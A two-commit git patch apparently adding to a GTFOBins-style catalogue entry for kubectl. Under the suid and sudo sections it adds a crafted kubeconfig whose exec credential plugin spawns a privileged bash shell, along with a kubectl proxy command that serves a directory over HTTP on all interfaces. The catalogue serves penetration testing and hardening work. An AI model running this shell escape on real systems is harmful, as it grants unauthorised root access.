From e057abb5f3a22f8b9eda1f1cd04118513e301737 Mon Sep 17 00:00:00 2001
From: Rolix <82376603+Rolix44@users.noreply.github.com>
Date: Fri, 20 Jun 2025 17:34:12 +0200
Subject: [PATCH 1/2] Update kubectl.md

Add privileged shell
---
 _gtfobins/kubectl.md | 64 ++++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 62 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/kubectl.md b/_gtfobins/kubectl.md
index 72cbe468..2eff897c 100644
--- a/_gtfobins/kubectl.md
+++ b/_gtfobins/kubectl.md
@@ -1,16 +1,76 @@
 ---
-description: It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`.
 functions:
   file-upload:
     - code: |
         LFILE=dir_to_serve
         kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
+      description: "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`."
   suid:
     - code: |
         LFILE=dir_to_serve
         ./kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
-  sudo:
+      description: "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`." 
+    - code: |-
+        cat << EOF > /tmp/config
+        apiVersion: v1
+        clusters:
+        - cluster:
+            server: https://test
+          name: kubernetes
+        contexts:
+        - context:
+            cluster: kubernetes
+            user: kubernetes-admin
+          name: kubernetes-admin@kubernetes
+        current-context: kubernetes-admin@kubernetes
+        kind: Config
+        preferences: {}
+        users:
+        - name: kubernetes-admin
+          user:
+            exec:
+              apiVersion: client.authentication.k8s.io/v1
+              command: /bin/bash
+              args: 
+                - "-p"
+                - "-c"
+                - "/bin/bash -p </dev/tty >/dev/tty 2>/dev/tty"
+              interactiveMode: Always
+        EOF
+        ./kubectl get pods --kubeconfig=/tmp/config 
+      description: "It pops a new privileged shell using custom configuration"
+  sudo: 
     - code: |
         LFILE=dir_to_serve
         sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/
+      description: "It serves files from a specified directory via HTTP, i.e., `http://<IP>:4444/x/<file>`."
+    - code: |-
+        cat << EOF > /tmp/config
+        apiVersion: v1
+        clusters:
+        - cluster:
+            server: https://test
+          name: kubernetes
+        contexts:
+        - context:
+            cluster: kubernetes
+            user: kubernetes-admin
+          name: kubernetes-admin@kubernetes
+        current-context: kubernetes-admin@kubernetes
+        kind: Config
+        preferences: {}
+        users:
+        - name: kubernetes-admin
+          user:
+            exec:
+              apiVersion: client.authentication.k8s.io/v1
+              command: /bin/bash
+              args: 
+                - "-p"
+                - "-c"
+                - "/bin/bash -p </dev/tty >/dev/tty 2>/dev/tty"
+              interactiveMode: Always
+        EOF
+        ./kubectl get pods --kubeconfig=/tmp/config 
+      description: "It pops a new privileged shell using custom configuration"
 ---

From 95832ff0277ba8e21bbe8eb82bec1b2d276a777a Mon Sep 17 00:00:00 2001
From: Rolix <82376603+Rolix44@users.noreply.github.com>
Date: Fri, 20 Jun 2025 17:56:43 +0200
Subject: [PATCH 2/2] Update kubectl.md

---
 _gtfobins/kubectl.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/kubectl.md b/_gtfobins/kubectl.md
index 2eff897c..6753a3d4 100644
--- a/_gtfobins/kubectl.md
+++ b/_gtfobins/kubectl.md
@@ -71,6 +71,6 @@ functions:
                 - "/bin/bash -p </dev/tty >/dev/tty 2>/dev/tty"
               interactiveMode: Always
         EOF
-        ./kubectl get pods --kubeconfig=/tmp/config 
+        sudo kubectl get pods --kubeconfig=/tmp/config 
       description: "It pops a new privileged shell using custom configuration"
 ---